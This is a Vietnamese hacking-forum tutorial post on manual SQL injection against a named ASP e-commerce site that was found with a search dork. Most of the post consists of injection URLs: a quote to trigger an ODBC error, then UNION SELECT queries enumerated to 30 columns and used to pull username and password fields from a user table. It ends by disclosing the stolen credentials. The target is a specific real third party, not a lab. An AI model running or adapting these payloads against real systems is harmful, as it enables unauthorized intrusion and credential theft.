ASP SQL Injection_Havij khó ra nhé.

Discussion in 'Web Application Security & Hacking' started by Mickey, Dec 9, 2017.

 1. Mickey

  Mickey Hacking For Hacker Staff Member

  Tìm site bằng dork cũ rồi "inurl:shopdisplayproducts.asp?id=" nên đụng tut bác nào thì bỏ qua nha:
  site đây:http://hoffmans.co.za/
  check:http://hoffmans.co.za/shopdisplayproducts.asp?id=1'
  Lỗi:
  Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

  [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order By specialOffer DESC, cname'.

  /shop$db.asp, line 831

  ok:"Microsoft OLE DB Provider for ODBC Drivers error '80040e14'"

  Bắt đầu:
  Thêm dòng sau vào URL : union select 1 from tbluser' thành: hoffmans.co.za/shopdisplayproducts.asp?id=1 union select 1 from tbluser'
  vẫn lỗi, tiếp nào: hoffmans.co.za/shopdisplayproducts.asp?id=1 union select 1,2 from tbluser' >>>>vẫn lỗi
  tiếp hoffmans.co.za/shopdisplayproducts.asp?id=1 union select 1,2,3 from tbluser' >>>vẫn lỗi
  mỏi tay quá, mọi người tự thêm các số vào nhé, dùng thêm addon hackbar cho tiện, mình thì mình mò ra rồi, nói luôn 30:

  http://hoffmans.co.za/shopdisplayproducts.asp?id=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from tbluser'

  ra cả đống số (1,3,4,21,22)! nhìn thích vl

  Giờ chọn đại 2 số, mình chọn 3 và 4 thay tương ứng là:fldusername và fldpassword
  thành ra thế này: http://hoffmans.co.za/shopdisplayproducts.asp?id=1 UNION SELECT 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from tbluser'

  và đc thế này: mike|sweet
   

Share This Page